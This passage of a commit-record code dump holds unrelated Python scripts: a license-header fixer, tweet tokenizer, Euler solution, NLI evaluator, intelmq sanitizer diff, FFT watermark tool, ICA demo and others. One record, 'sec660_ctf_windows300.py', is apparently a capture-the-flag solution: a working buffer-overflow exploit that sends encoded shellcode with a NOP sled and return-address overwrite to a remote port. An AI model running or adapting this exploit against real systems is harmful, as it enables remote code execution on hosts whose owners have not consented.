            text = re.sub(r'^/\*+/$.*^/\*+/$', '', text, flags=re.S | re.M)
            # Make sure that any previous C++-style header (with extra character)
            # is also removed.
            text = re.sub(r'(?:^//\*.*\n)*', '', text, flags=re.M)
            # Now cleanup extra blank lines
            text = re.sub(r'\A(^\s*\n)', '', text)
            suffix = os.path.splitext(filename)
            if suffix[-1] == '.h':
                # Strip legacy include guards; headers rely on the new scheme.
                text = re.sub(r'^#ifndef\s*\S+_H_?\s*\n#define.*\n', '', text, flags=re.M)
                text = re.sub(r'^#endif.*\n[\s]*\Z', '', text, flags=re.M)
            # Update: write to a temp file, then atomically replace the original.
            f = open(filename + '~tmp', 'w')
            f.write(header + '\n\n')
            f.write(text)
            f.close()
            os.rename(filename + '~tmp', filename)
def checkAndUpdatePython(filename):
    """Report (or, with -u, rewrite) the license header of one Python file."""
    f = open(filename)
    text = f.read()
    f.close()
    header = python_header
    # Check (exact match only)
    if (string.find(text, header) == -1):
        # print the first 10 lines or so of the file
        if global_options.update == False: # Report only
            print filename + ' does not contain an up to date header'
            if global_options.verbose == True:
                print '>'*40, '\n', '\n'.join((text.split('\n', 10))[:10]), '\n'*5
        else:
            # Save off the shebang line if it exists
            m = re.match(r'#!.*\n', text)
            shebang = ''
            if m:
                shebang = m.group(0)
                text = re.sub(r'^.*\n', '', text)
            # Save off any pylint disable directives
            m = re.match(r'\A#pylint:\s+disable.*\n', text)
            pylint_disable = ''
            if m:
                pylint_disable = m.group(0)
                text = re.sub(r'^.*\n', '', text)
            pylint_enable = False
            if re.search(r'#pylint: enable=missing-docstring', text) != None:
                pylint_enable = True
            # Make sure any previous box-style header version is removed
            text = re.sub(r'\A(?:#.*#\n)*', '', text)
            # Make sure any previous version of the new header is removed
            text = re.sub(r'^#\*.*\n', '', text, flags=re.M)
            # Discard any pylint missing-docstring commands
            text = re.sub(r'\A#pylint:.*missing-docstring.*\n', '', text)
            # Now cleanup extra blank lines at the beginning of the file
            text = re.sub(r'\A(^\s*\n)', '', text)
            # Update: reassemble shebang + pylint directives + header + body.
            f = open(filename + '~tmp', 'w')
            f.write(shebang)
            f.write(pylint_disable)
            f.write(header + '\n')
            if pylint_enable:
                f.write('#pylint: enable=missing-docstring\n')
            if len(text) != 0:
                f.write('\n' + text)
            f.close()
            # Preserve the original file's mode/timestamps before replacing it.
            shutil.copystat(filename, filename + '~tmp')
            os.rename(filename + '~tmp', filename)
if __name__ == '__main__':
    parser = OptionParser()
    parser.add_option("-u", "--update", action="store_true", dest="update", default=False)
    parser.add_option("-v", "--verbose", action="store_true", dest="verbose", default=False)
    parser.add_option("--python-only", action="store_true", dest="python_only", default=False)
    parser.add_option("--cxx-only", action="store_true", dest="cxx_only", default=False)
    parser.add_option("-f", "--force", action="store_true", dest="force", default=False)
    (global_options, args) = parser.parse_args()
    fixupHeader()
| Python | 0.000001 | |
e7a2ec9b38b69a852667cca8d5c7da3ff242ce61 | Add processTweets.py | processTweets.py | processTweets.py | import json
import re
import operator
import string
import collections
from collections import Counter
from nltk.corpus import stopwords
from nltk.tokenize import word_tokenize
# Regex for emoticons (verbose syntax: whitespace ignored, '#' starts a comment).
# BUG FIX: the eyes line read "[:=;] Eyes" with no '#', so under re.VERBOSE the
# letters E, y, e, s were literal pattern characters and no emoticon matched.
emoticons_str = r"""
(?:
[:=;] # Eyes
[oO\-]? # Nose (optional)
[D\)\]\(\]/\\OpP] # Mouth
)"""
#Setup regex to split mentions, hashtags, urls, etc. together
# Order matters: earlier alternatives win, so emoticons/HTML/mentions are
# matched before the generic word and catch-all patterns.
regex_str = [
    emoticons_str,
    r'<[^>]+>', #HTML tags
    r'(?:@[\w_]+)', #@-mentions
    r"(?:\#+[\w_]+[\w\'_\-]*[\w_]+)", #hashtags
    r'http[s]?://(?:[a-z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-f][0-9a-f]))+', # URLs
    r'(?:(?:\d+,?)+(?:\.?\d+)?)', #numbers
    r"(?:[a-z][a-z'\-_]+[a-z])", #words with - and '
    r'(?:[\w_]+)', #other words
    r'(?:\S)' #anything else
]
# Compiled once at import time; VERBOSE is needed for emoticons_str's layout.
tokens_re = re.compile(r'('+'|'.join(regex_str)+')', re.VERBOSE | re.IGNORECASE)
emoticon_re = re.compile(r'^'+emoticons_str+'$', re.VERBOSE | re.IGNORECASE)
def tokenize(s):
    """Split string *s* into tokens using the combined pattern above."""
    return tokens_re.findall(s)
def preprocess(s, lowercase=False):
    """Tokenize *s*; if *lowercase*, lower-case every token except emoticons.

    Returns the list of tokens produced by ``tokenize``.
    """
    tokens = tokenize(s)
    if lowercase:
        tokens = [token if emoticon_re.search(token) else token.lower() for token in tokens]
    # BUG FIX (dead code removed): a trailing loop rebound a local name
    # (`token = token.encode('utf-8')`) without ever changing the returned
    # list, so it had no effect.
    return tokens
punctuation = list(string.punctuation)
others = ['RT', 'via', u'\u2026', 'The', u'\u2019', 'amp']
stop = stopwords.words('english') + punctuation + others
#Find most common words
def terms_only(fname, number):
    """Print the *number* most common plain terms (no hashtags/mentions/stopwords)
    across the line-delimited tweet JSON in *fname*."""
    with open(fname, 'r') as f:
        count_all = Counter()
        for line in f:
            tweet = json.loads(line)
            terms_stop = [term for term in preprocess(tweet['text'])
                          if term not in stop and not term.startswith(('#', '@'))]
            count_all.update(terms_stop)
        print(count_all.most_common(number))
#Find most common hashtags
def hash_only(fname, number):
    """Print the *number* most common #hashtags in *fname*."""
    with open(fname, 'r') as f:
        count_all = Counter()
        for line in f:
            tweet = json.loads(line)
            terms_hash = [term for term in preprocess(tweet['text'])
                          if term not in stop if term.startswith('#')]
            count_all.update(terms_hash)
        print(count_all.most_common(number))
#Find most common mentions
def mentions_only(fname, number):
    """Print the *number* most common @mentions in *fname*."""
    with open(fname, 'r') as f:
        count_all = Counter()
        for line in f:
            tweet = json.loads(line)
            terms_mentions = [term for term in preprocess(tweet['text'])
                              if term not in stop if term.startswith('@')]
            count_all.update(terms_mentions)
        print(count_all.most_common(number))
#Find most common two-term occurances
def cooccurances(fname, number):
    """Print the *number* most frequent within-tweet term pairs in *fname*."""
    with open(fname, 'r') as f:
        # com[w1][w2] counts co-occurrences with w1 < w2 (pairs stored sorted).
        com = collections.defaultdict(lambda: collections.defaultdict(int))
        for line in f:
            tweet = json.loads(line)
            terms_only = [term for term in preprocess(tweet['text'])
                          if term not in stop and not term.startswith(('#', '@'))]
            for i in range(len(terms_only)):
                for j in range(i+1, len(terms_only)):
                    w1, w2 = sorted([terms_only[i], terms_only[j]])
                    if w1 != w2:
                        com[w1][w2] += 1
        # Collect each term's top partners, then take the global top pairs.
        com_max = []
        for t1 in com:
            t1_max_terms = sorted(com[t1].items(), key=operator.itemgetter(1), reverse=True)[:number]
            for t2, t2_count in t1_max_terms:
                com_max.append(((t1, t2), t2_count))
        terms_max = sorted(com_max, key=operator.itemgetter(1), reverse=True)
        print(terms_max[:number])
#Main Function Begins
# Runs each report over a hard-coded tweets.json, 10 results apiece.
if __name__ == "__main__":
    fname = "tweets.json"
    number = 10
    print "Terms only"
    terms_only(fname, number)
    print "\nHashtags only"
    hash_only(fname, number)
    print "\nMentions only"
    mentions_only(fname, number)
    print "\nCooccurances"
    cooccurances(fname, number)
| Python | 0.000001 | |
e39bce6ba02ad4ed3c20768c234606afb48ac86a | Solve Largest Product | python/euler008.py | python/euler008.py | #!/bin/python3
import sys
from functools import reduce
class LargestProduct:
    """Find the largest product of *num_consecutive_digits* adjacent digits in *num*."""
    def __init__(self, num, num_consecutive_digits):
        self.num = num
        self.num_consecutive_digits = num_consecutive_digits
    def largest_product(self):
        """Return the maximum product over every window of consecutive digits."""
        return max(map(LargestProduct.product, LargestProduct.slices(LargestProduct.digits(self.num), self.num_consecutive_digits)))
    @staticmethod
    def slices(array, slice_length):
        """Return every contiguous window of *slice_length* items of *array*.

        BUG FIX: the upper bound is ``len(array) - slice_length + 1``; the
        original dropped the final window (and produced no windows at all when
        len(array) == slice_length).
        """
        return [array[i:i + slice_length] for i in range(len(array) - slice_length + 1)]
    @staticmethod
    def digits(num):
        """Split the decimal string/number *num* into a list of int digits."""
        return [int(x) for x in str(num)]
    @staticmethod
    def product(array):
        """Multiply all elements of *array* together."""
        return reduce((lambda x, y: x * y), array)
# HackerRank-style driver: first line is the number of test cases; each
# case is "N K" (digit count and window size) followed by the digit string.
t = int(input().strip())
for a0 in range(t):
    _, num_consecutive_digits = map(int, input().strip().split(' '))
    num = input().strip()
    lp = LargestProduct(num, num_consecutive_digits)
    print (lp.largest_product())
| Python | 0.999999 | |
8c14684667b48921987f833f41727d036a3fe9f7 | Add SICK evaluation script in python | python/evaluate.py | python/evaluate.py | #!/usr/bin/env python
# -*- coding: utf8 -*-
import argparse
import re
from collections import Counter
#################################
def parse_arguments():
    """Build the command-line interface and return the parsed arguments."""
    parser = argparse.ArgumentParser(
        description="Evaluate predictions against gold labels.")
    # positional arguments: system output first, gold standard second
    parser.add_argument('sys', metavar='FILE',
                        help='File with problem ID, white space and label per line')
    parser.add_argument('gld', metavar='FILE',
                        help="File with gold label. The format might vary")
    # meta parameters
    parser.add_argument('-v', '--verbose', dest='v', default=0, type=int,
                        metavar='N', help='verbosity level of reporting')
    return parser.parse_args()
#################################
def read_id_labels(filepath, pattern=r"(\d+)\s+(NEUTRAL|CONTRADICTION|ENTAILMENT)"):
    '''Read a dict mapping problem ID -> label from the file.

    Each line is matched against `pattern`: group 1 is the problem ID and
    group 2 the label.  Non-matching lines are skipped and a repeated ID
    keeps the label seen last.  The default pattern is now a raw string so
    "\\d" / "\\s" are regex escapes rather than (deprecated) string escapes;
    the docstring previously claimed a list of pairs but a dict is returned.
    '''
    id_labels = {}
    with open(filepath) as f:
        for line in f:
            m = re.search(pattern, line)
            if m:
                id_labels[m.group(1)] = m.group(2)
    return id_labels
#################################
def draw_conf_matrix(counter, labs=('ENTAILMENT', 'CONTRADICTION', 'NEUTRAL')):
    '''Draw a confusion matrix for labels from two sources.

    `counter` maps (system_label, gold_label) pairs to counts; rows are
    gold labels, columns system labels.  The default label sequence is a
    tuple rather than a list so the argument default is immutable.
    '''
    print(f"{63*'-'}\n{'':15} {labs[0]:>15} {labs[1]:>15} {labs[2]:>15}\n{63*'-'}")
    for gld in labs:
        print(f"{gld:>15}", end=' ')
        for sys_lab in labs:
            # missing pairs count as 0 when `counter` is a collections.Counter
            print(f"{counter[(sys_lab, gld)]:>15}", end=' ')
        print()
    print(63*'-')
#################################
def calc_measures(counter, labs=['ENTAILMENT', 'CONTRADICTION', 'NEUTRAL']):
    '''Calculate various measures'''
    # `counter` maps (system_label, gold_label) -> count
    ent, con, neu = labs[0], labs[1], labs[2]
    total = sum(counter.values())
    diag = sum(counter[(lab, lab)] for lab in labs)
    # precision and recall treat ENTAILMENT & CONTRADICTION as positives
    diag_ec = counter[(ent, ent)] + counter[(con, con)]
    sys_neut = sum(counter[(neu, lab)] for lab in labs)
    gld_neut = sum(counter[(lab, neu)] for lab in labs)
    return {
        'accuracy': 100.0 * diag / total,
        'precision': 100.0 * diag_ec / (total - sys_neut),
        'recall': 100.0 * diag_ec / (total - gld_neut),
    }
#################################
if __name__ == '__main__':
    args = parse_arguments()
    # system answers use the default "ID LABEL" pattern; gold files may
    # carry extra columns, hence the looser anchored pattern below
    sys_ans = read_id_labels(args.sys)
    gld_ans = read_id_labels(args.gld, pattern="^(\d+)\s+.+(NEUTRAL|CONTRADICTION|ENTAILMENT)$")
    assert len(sys_ans) == len(gld_ans),\
        f"The sources contain different number of problems ({len(sys_ans)} vs {len(gld_ans)})"
    # pair the system and gold label per problem ID, then tally the pairs
    lab_pairs = [ (sys_ans[k], gld_ans[k]) for k in sys_ans ]
    counter = Counter(lab_pairs)
    draw_conf_matrix(counter)
    m = calc_measures(counter)
    for name in sorted(m.keys()):
        print(f"{name:<12}: {m[name]:4.2f}%")
| Python | 0 | |
dc4620b46cdca4084fe0b64e3f8e08025e511cea | fix sanitizer | intelmq/bots/experts/sanitizer/sanitizer.py | intelmq/bots/experts/sanitizer/sanitizer.py | from intelmq.lib.bot import Bot, sys
from intelmq.bots import utils
class SanitizerBot(Bot):
    """Expert bot that normalises the source_*/destination_* fields of an event.

    For each side (source / destination) it collects whatever ip /
    domain-name / url values are present, derives the missing ones
    (url -> domain name -> ip) via the `utils` helpers, writes the
    normalised values back, and drops ASN fields that are not integers.
    """

    def process(self):
        event = self.receive_message()
        if event:
            # one tuple of related keys per side of the connection
            keys_pairs = [
                            (
                                "source_ip",
                                "source_domain_name",
                                "source_url",
                                "source_asn"
                            ),
                            (
                                "destination_ip",
                                "destination_domain_name",
                                "destination_url",
                                "destination_asn"
                            )
                         ]
            for keys in keys_pairs:
                ip = domain_name = url = None
                # first pass: collect whatever valid values already exist
                for key in keys:
                    if "asn" in key:
                        continue
                    if not event.contains(key):
                        continue
                    value = event.value(key)
                    if len(value) <= 2:  # ignore invalid values
                        continue
                    result = utils.is_ip(value)
                    if result:
                        ip = result
                    result = utils.is_domain_name(value)
                    if result:
                        domain_name = result
                    result = utils.is_url(value)
                    if result:
                        url = result
                # derive the missing pieces: url -> domain name -> ip
                if not domain_name and url:
                    domain_name = utils.get_domain_name_from_url(url)
                if not ip and domain_name:
                    ip = utils.get_ip_from_domain_name(domain_name)
                if not ip and url:
                    ip = utils.get_ip_from_url(url)
                # second pass: rewrite the fields with the normalised values
                for key in keys:
                    if "url" in key and url:
                        event.clear(key)
                        event.add(key, url)
                    if "domain_name" in key and domain_name:
                        event.clear(key)
                        event.add(key, domain_name)
                    if "ip" in key and ip:
                        event.clear(key)
                        event.add(key, ip)
                    if "asn" in key:
                        try:
                            int(event.value(key))
                        except ValueError:
                            # non-numeric ASN: drop the field entirely
                            event.clear(key)
            self.send_message(event)
        self.acknowledge_message()
if __name__ == "__main__":
    # the bot id is passed as the first command-line argument
    bot = SanitizerBot(sys.argv[1])
    bot.start()
| from intelmq.lib.bot import Bot, sys
from intelmq.bots import utils
class SanitizerBot(Bot):
    """Expert bot that derives missing ip / domain-name / url values for
    the source_* and destination_* fields of an event."""

    def process(self):
        event = self.receive_message()
        if event:
            # one tuple of related keys per side of the connection
            keys_pairs = [
                            (
                                "source_ip",
                                "source_domain_name",
                                "source_url"
                            ),
                            (
                                "destination_ip",
                                "destination_domain_name",
                                "destination_url"
                            )
                         ]
            for keys in keys_pairs:
                ip = domain_name = url = None
                # collect whatever valid values the event already carries
                for key in keys:
                    if not event.contains(key):
                        continue
                    value = event.value(key)
                    if len(value) <= 2:  # ignore invalid values
                        continue
                    result = utils.is_ip(value)
                    if result:
                        ip = result
                    result = utils.is_domain_name(value)
                    if result:
                        domain_name = result
                    result = utils.is_url(value)
                    if result:
                        url = result
                # derive missing pieces: url -> domain name -> ip
                if not domain_name and url:
                    domain_name = utils.get_domain_name_from_url(url)
                if not ip and domain_name:
                    ip = utils.get_ip_from_domain_name(domain_name)
                if not ip and url:
                    ip = utils.get_ip_from_url(url)
                for key in keys:
                    # NOTE(review): clear() runs unconditionally, so when no
                    # replacement value was derived the original field is
                    # wiped without being re-added below.
                    event.clear(key)
                    if "url" in key and url:
                        event.add(key, url)
                    if "domain_name" in key and domain_name:
                        event.add(key, domain_name)
                    if "ip" in key and ip:
                        event.add(key, ip)
            self.send_message(event)
        self.acknowledge_message()
if __name__ == "__main__":
    # the bot id is passed as the first command-line argument
    bot = SanitizerBot(sys.argv[1])
    bot.start()
| Python | 0.000001 |
cd239be7ec84ccb000992841700effeb4bc6a508 | Add quickstart fabfile.py | streamparse/bootstrap/project/fabfile.py | streamparse/bootstrap/project/fabfile.py | """fab env:prod deploy:wordcount"""
import json
from fabric.api import run, put, env as _env
from fabric.decorators import task
@task
def env(e=None):
    """Activate a particular environment from the config.json file."""
    with open('config.json', 'r') as config_file:
        settings = json.load(config_file)
    # point fabric's host list at the chosen environment
    _env.hosts = settings['envs'][e]['hosts']
@task
def deploy(topology=None):
    """Deploy a topology to a remote host. Deploying a streamparse topology
    performs the following steps:

    1. Create an uberjar which contains all code.
    2. Push the topology virtualenv requirements to remote.
    3. Update virtualenv on host server.
    4. Submit topology (in uberjar) to remote Storm cluster."""
    # TODO: not implemented yet
    pass
| Python | 0.000001 | |
7f7fbb94796134301ee5289fa447e8632f59c912 | Create sec660_ctf_windows300.py | sec660_ctf_windows300.py | sec660_ctf_windows300.py | #!/usr/bin/python
import socket
import sys
import time
buf = ""
buf += "\xd9\xc5\xba\x43\xdc\xd1\x08\xd9\x74\x24\xf4\x5e\x31"
buf += "\xc9\xb1\x53\x31\x56\x17\x83\xee\xfc\x03\x15\xcf\x33"
buf += "\xfd\x65\x07\x31\xfe\x95\xd8\x56\x76\x70\xe9\x56\xec"
buf += "\xf1\x5a\x67\x66\x57\x57\x0c\x2a\x43\xec\x60\xe3\x64"
buf += "\x45\xce\xd5\x4b\x56\x63\x25\xca\xd4\x7e\x7a\x2c\xe4"
buf += "\xb0\x8f\x2d\x21\xac\x62\x7f\xfa\xba\xd1\x6f\x8f\xf7"
buf += "\xe9\x04\xc3\x16\x6a\xf9\x94\x19\x5b\xac\xaf\x43\x7b"
buf += "\x4f\x63\xf8\x32\x57\x60\xc5\x8d\xec\x52\xb1\x0f\x24"
buf += "\xab\x3a\xa3\x09\x03\xc9\xbd\x4e\xa4\x32\xc8\xa6\xd6"
buf += "\xcf\xcb\x7d\xa4\x0b\x59\x65\x0e\xdf\xf9\x41\xae\x0c"
buf += "\x9f\x02\xbc\xf9\xeb\x4c\xa1\xfc\x38\xe7\xdd\x75\xbf"
buf += "\x27\x54\xcd\xe4\xe3\x3c\x95\x85\xb2\x98\x78\xb9\xa4"
buf += "\x42\x24\x1f\xaf\x6f\x31\x12\xf2\xe7\xf6\x1f\x0c\xf8"
buf += "\x90\x28\x7f\xca\x3f\x83\x17\x66\xb7\x0d\xe0\x89\xe2"
buf += "\xea\x7e\x74\x0d\x0b\x57\xb3\x59\x5b\xcf\x12\xe2\x30"
buf += "\x0f\x9a\x37\xac\x07\x3d\xe8\xd3\xea\xfd\x58\x54\x44"
buf += "\x96\xb2\x5b\xbb\x86\xbc\xb1\xd4\x2f\x41\x3a\xcb\xf3"
buf += "\xcc\xdc\x81\x1b\x99\x77\x3d\xde\xfe\x4f\xda\x21\xd5"
buf += "\xe7\x4c\x69\x3f\x3f\x73\x6a\x15\x17\xe3\xe1\x7a\xa3"
buf += "\x12\xf6\x56\x83\x43\x61\x2c\x42\x26\x13\x31\x4f\xd0"
buf += "\xb0\xa0\x14\x20\xbe\xd8\x82\x77\x97\x2f\xdb\x1d\x05"
buf += "\x09\x75\x03\xd4\xcf\xbe\x87\x03\x2c\x40\x06\xc1\x08"
buf += "\x66\x18\x1f\x90\x22\x4c\xcf\xc7\xfc\x3a\xa9\xb1\x4e"
buf += "\x94\x63\x6d\x19\x70\xf5\x5d\x9a\x06\xfa\x8b\x6c\xe6"
buf += "\x4b\x62\x29\x19\x63\xe2\xbd\x62\x99\x92\x42\xb9\x19"
buf += "\xa2\x08\xe3\x08\x2b\xd5\x76\x09\x36\xe6\xad\x4e\x4f"
buf += "\x65\x47\x2f\xb4\x75\x22\x2a\xf0\x31\xdf\x46\x69\xd4"
buf += "\xdf\xf5\x8a\xfd"
# buf1: short benign probe.  buf2: 100-byte NOP sled + shellcode, padded
# with 'A's to 1932 bytes, then a 4-byte little-endian overwrite
# (\xca\x12\x40\00 = 0x004012ca) -- presumably the saved return address;
# TODO confirm against the target binary.
buf1 = "B" * 10
buf2 = "\x90" * 100 + buf + "A" * (1932 - 100 - len(buf)) + "\xca\x12\x40\00"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((sys.argv[1], 1337))
# send the probe first, then wait for operator confirmation (e.g. to
# attach a debugger) before firing the real payload
s.send(buf1 + '\r\n')
print s.recv(1024)
#time.sleep(30)
raw_input('Press enter to continue')
s.send(buf2 + '\r\n')
print s.recv(1024)
s.close()
| Python | 0.000001 | |
348b10962f12e1c49ed5c4caf06a838b89b1e5af | Create plasma.py | plasma.py | plasma.py | import geometry
| Python | 0.000003 | |
602c999c9b5a786623135df1cbf27b529e140d6e | add watermark script | script/watermark.py | script/watermark.py | #!/usr/bin/env python
# -*- coding: utf8 -*-
import os
import random
from argparse import ArgumentParser
import cv2
import numpy
class InvisibleWaterMark:
    """Hide/recover a watermark image in the frequency domain of a carrier.

    encode() scrambles the watermark pixels with a permutation seeded by
    height + width (so decode() can reproduce it), adds them to the
    carrier's 2-D FFT and writes the inverse transform; decode() recovers
    the watermark by diffing the FFTs of the original and watermarked
    images and undoing the permutation.  The large blocks of commented-out
    prototype code were removed; the active logic is unchanged.
    """

    def __init__(self):
        # NOTE(review): kept for backwards compatibility but unused --
        # encode()/decode() seed `random` with height + width instead.
        self.seed = 1

    def encode(self, image, watermark, result):
        """Embed the image at path `watermark` into `image`, saving to `result`."""
        img = cv2.imread(image)
        img_f = numpy.fft.fft2(img)
        height, width, channel = numpy.shape(img)
        watermark = cv2.imread(watermark)
        wm_height, wm_width = watermark.shape[0], watermark.shape[1]
        # deterministic pixel permutation, reproducible at decode time
        x, y = range(height / 2), range(width)
        random.seed(height + width)
        random.shuffle(x)
        random.shuffle(y)
        tmp = numpy.zeros(img.shape)
        for i in range(height / 2):
            for j in range(width):
                if x[i] < wm_height and y[j] < wm_width:
                    tmp[i][j] = watermark[x[i]][y[j]]
                    # also place a mirrored copy in the opposite corner
                    tmp[height - 1 - i][width - 1 - j] = tmp[i][j]
        res_f = img_f + 2 * tmp
        res = numpy.fft.ifft2(res_f)
        res = numpy.real(res)
        cv2.imwrite(result, res, [int(cv2.IMWRITE_JPEG_QUALITY), 100])

    def decode(self, image, encode_image, result):
        """Extract the watermark hidden in `encode_image`, given the original `image`."""
        ori = cv2.imread(image)
        img = cv2.imread(encode_image)
        ori_f = numpy.fft.fft2(ori)
        img_f = numpy.fft.fft2(img)
        height, width = ori.shape[0], ori.shape[1]
        # invert of encode(): (encoded - original) spectrum / 2
        watermark = (ori_f - img_f) / 2
        watermark = numpy.real(watermark)
        res = numpy.zeros(watermark.shape)
        # regenerate the exact permutation used by encode()
        random.seed(height + width)
        x = range(height / 2)
        y = range(width)
        random.shuffle(x)
        random.shuffle(y)
        for i in range(height / 2):
            for j in range(width):
                res[x[i]][y[j]] = watermark[i][j]
        cv2.imwrite(result, res, [int(cv2.IMWRITE_JPEG_QUALITY), 100])
def build_parser():
    """Create the command-line parser for the watermark tool.

    All four options (--ori, --im, --res, --cmd) are mandatory.
    """
    parser = ArgumentParser()
    for flag in ('ori', 'im', 'res', 'cmd'):
        parser.add_argument('--' + flag, dest=flag, required=True)
    return parser
def main():
    """Parse CLI options, validate the input files and dispatch to
    InvisibleWaterMark.encode or .decode."""
    parser = build_parser()
    options = parser.parse_args()
    ori = options.ori
    im = options.im
    res = options.res
    cmd = options.cmd

    if not os.path.isfile(ori):
        parser.error("image %s does not exist." % ori)
    if not os.path.isfile(im):
        parser.error("image %s does not exist." % im)

    watermark = InvisibleWaterMark()
    if cmd == 'encode':
        watermark.encode(ori, im, res)
    elif cmd == 'decode':
        watermark.decode(ori, im, res)
    else:
        # bug fix: the message previously interpolated `im` (an image
        # path) instead of the offending `cmd` value
        parser.error("cmd %s does not exist." % cmd)
if __name__ == "__main__":
main()
| Python | 0.000001 | |
bd05625c2e0a164f0b720c8c13fb06540d4fcdb9 | Create ica_demo.py (#496) | scripts/ica_demo.py | scripts/ica_demo.py | # Blind source separation using FastICA and PCA
# Author : Aleyna Kara
# This file is based on https://github.com/probml/pmtk3/blob/master/demos/icaDemo.m
from sklearn.decomposition import PCA, FastICA
import numpy as np
import matplotlib.pyplot as plt
import pyprobml_utils as pml
def plot_signals(signals, suptitle, file_name):
    """Plot each signal in its own stacked subplot and save as a PDF.

    Relies on the module-level globals `n_signals` (subplot count) and
    `N` (x-axis limit); the figure is saved as `<file_name>.pdf` via
    pyprobml_utils and then shown.
    """
    plt.figure(figsize=(8, 4))
    for i, signal in enumerate(signals, 1):
        plt.subplot(n_signals, 1, i)
        plt.plot(signal)
        plt.xlim([0, N])
    plt.tight_layout()
    plt.suptitle(suptitle)
    plt.subplots_adjust(top=0.85)  # leave room for the suptitle
    pml.savefig(f'{file_name}.pdf')
    plt.show()
# https://github.com/davidkun/FastICA/blob/master/demosig.m
def generate_signals():
    """Create `n_signals` source signals of length N and a random mix of them.

    Uses the module-level globals `n_signals` and `N` and the current numpy
    RNG state (the demo seeds it before calling).  Returns
    (signals, mixed_signals) where mixed_signals = A @ signals for a
    random mixing matrix A.
    """
    v = np.arange(0, 500)
    signals = np.zeros((n_signals, N))
    signals[0, :] = np.sin(v/2) # sinusoid
    signals[1, :] = ((v % 23 - 11) / 9)**5
    signals[2, :] = ((v % 27 - 13)/ 9) # sawtooth
    rand = np.random.rand(1, N)
    signals[3, :] = np.where(rand < 0.5, rand * 2 -1, -1) * np.log(np.random.rand(1, N)) #impulsive noise
    # scale each row to unit std, then shift to zero mean
    signals /= signals.std(axis=1).reshape((-1,1))
    signals -= signals.mean(axis=1).reshape((-1,1))
    A = np.random.rand(n_signals, n_signals) # mixing matrix
    return signals, A @ signals
np.random.seed(0)  # deterministic demo output
n_signals, N = 4, 500
signals, mixed_signals = generate_signals()

plot_signals(signals, 'Truth', 'ica-truth')
plot_signals(mixed_signals, 'Observed Signals', 'ica-obs')

# estimate the sources with PCA (baseline) and FastICA; both operate on
# samples-as-rows, hence the transposes
pca = PCA(whiten=True, n_components=4)
signals_pca = pca.fit(mixed_signals.T).transform(mixed_signals.T)
ica = FastICA(algorithm='deflation', n_components=4)
signals_ica = ica.fit_transform(mixed_signals.T)

plot_signals(signals_pca.T, 'PCA estimate','ica-pca')
plot_signals(signals_ica.T, 'ICA estimate', 'ica-ica')
a8add82f2f9092d07f9ef40420c4b303700c912d | add a 'uniq' function | lib/uniq.py | lib/uniq.py | # from http://www.peterbe.com/plog/uniqifiers-benchmark
def identity(x):
return x
def uniq(seq, idfun=identity):
# order preserving
seen = {}
result = []
for item in seq:
marker = idfun(item)
if marker in seen:
continue
seen[marker] = True
result.append(item)
return result
| Python | 0.999997 | |
c57c672aae98fb5b280f70b68ac27fc2d94a243f | Add test class to cover the RandomForestClassifier in Go | tests/estimator/classifier/RandomForestClassifier/RandomForestClassifierGoTest.py | tests/estimator/classifier/RandomForestClassifier/RandomForestClassifierGoTest.py | # -*- coding: utf-8 -*-
from unittest import TestCase
from sklearn.ensemble import RandomForestClassifier
from tests.estimator.classifier.Classifier import Classifier
from tests.language.Go import Go
class RandomForestClassifierGoTest(Go, Classifier, TestCase):
    """Exercise the Go code generator against a RandomForestClassifier."""

    def setUp(self):
        super(RandomForestClassifierGoTest, self).setUp()
        # a fixed random_state keeps the fitted estimator (and therefore
        # the generated Go source) deterministic across runs
        self.estimator = RandomForestClassifier(n_estimators=100,
                                                random_state=0)

    def tearDown(self):
        super(RandomForestClassifierGoTest, self).tearDown()
| Python | 0 | |
e045a7bd1c3d791de40412bafa62702bee59132e | Add Python solution for day 15. | day15/solution.py | day15/solution.py |
# Parse the puzzle input: one ingredient per line, e.g.
# "Sugar: capacity 3, durability 0, flavor 0, texture -3, calories 2".
data = open("data", "r").read()

ingredients = []
for line in data.split("\n"):
    name = line.split(": ")[0]  # NOTE(review): parsed but never used below
    properties = line.split(": ")[1].split(", ")
    props = { 'value': 0 }  # 'value' = teaspoons of this ingredient, set later
    for prop in properties:
        props[prop.split(" ")[0]] = int(prop.split(" ")[1])
    ingredients.append(props)
def getPropertyScore(property, ingredients):
    """Sum `property` * teaspoon-count over all ingredients, clamped at zero.

    Each ingredient dict must carry the `property` key and a 'value' key
    (teaspoons used); per the puzzle rules a negative total scores 0.
    max() replaces the original if/else clamp.
    """
    total = sum(ingredient[property] * ingredient['value']
                for ingredient in ingredients)
    return max(total, 0)
def calculateScore(ingredients):
    """Return (score, calories) for a mix whose 'value' fields are set.

    The score is the product of the four clamped property totals; the
    calorie total is returned separately for the 500-calorie constraint.
    """
    score = 1
    for prop in ("capacity", "durability", "flavor", "texture"):
        score *= getPropertyScore(prop, ingredients)
    calories = getPropertyScore("calories", ingredients)
    return score, calories
def addValue(ingredient, value):
    # Mutates `ingredient` in place (sets its teaspoon count) and returns
    # it, so calls can be used inline when building the score input list.
    ingredient['value'] = value
    return ingredient
maxScore = -100
optionsTried = 0
# Enumerate every split of 100 teaspoons across the four ingredients
# (each getting at least one); keep the best score among 500-calorie mixes.
for i in xrange(1, 100):
    for j in xrange(1, 100 - i):
        for k in xrange(1, 100 - i - j):
            h = 100 - i - j - k  # remainder goes to the fourth ingredient
            scoreInput = [
                addValue(ingredients[0], i),
                addValue(ingredients[1], j),
                addValue(ingredients[2], k),
                addValue(ingredients[3], h)
            ]
            score, calories = calculateScore(scoreInput)
            if calories == 500 and maxScore < score:
                maxScore = score
            optionsTried += 1

print "maxScore:", maxScore
print "optionsTried:", optionsTried
| Python | 0.000004 | |
df68e5aa8ab620f03c668ae886ed8a1beef3c697 | Add HKDF-SHA256 implementation. | hkdf-sha256.py | hkdf-sha256.py | #!/usr/bin/python
# -*- coding: utf-8 -*-
from Crypto.Hash import HMAC
from Crypto.Hash import SHA256
import obfsproxy.transports.base as base
import math
class HKDF_SHA256( object ):

    """
    Implements HKDF using SHA256: https://tools.ietf.org/html/rfc5869

    This class only implements the `expand' but not the `extract' stage.
    """

    def __init__( self, prk, info="", length=32 ):
        # `prk` is the pseudo-random key from HKDF's extract stage, `info`
        # the optional context string, `length` the bytes of output keying
        # material (OKM) to derive.
        self.HashLen = 32  # SHA-256 digest size in bytes

        # RFC 5869 caps the OKM at 255 * HashLen (the counter is one byte)
        if length > (self.HashLen * 255):
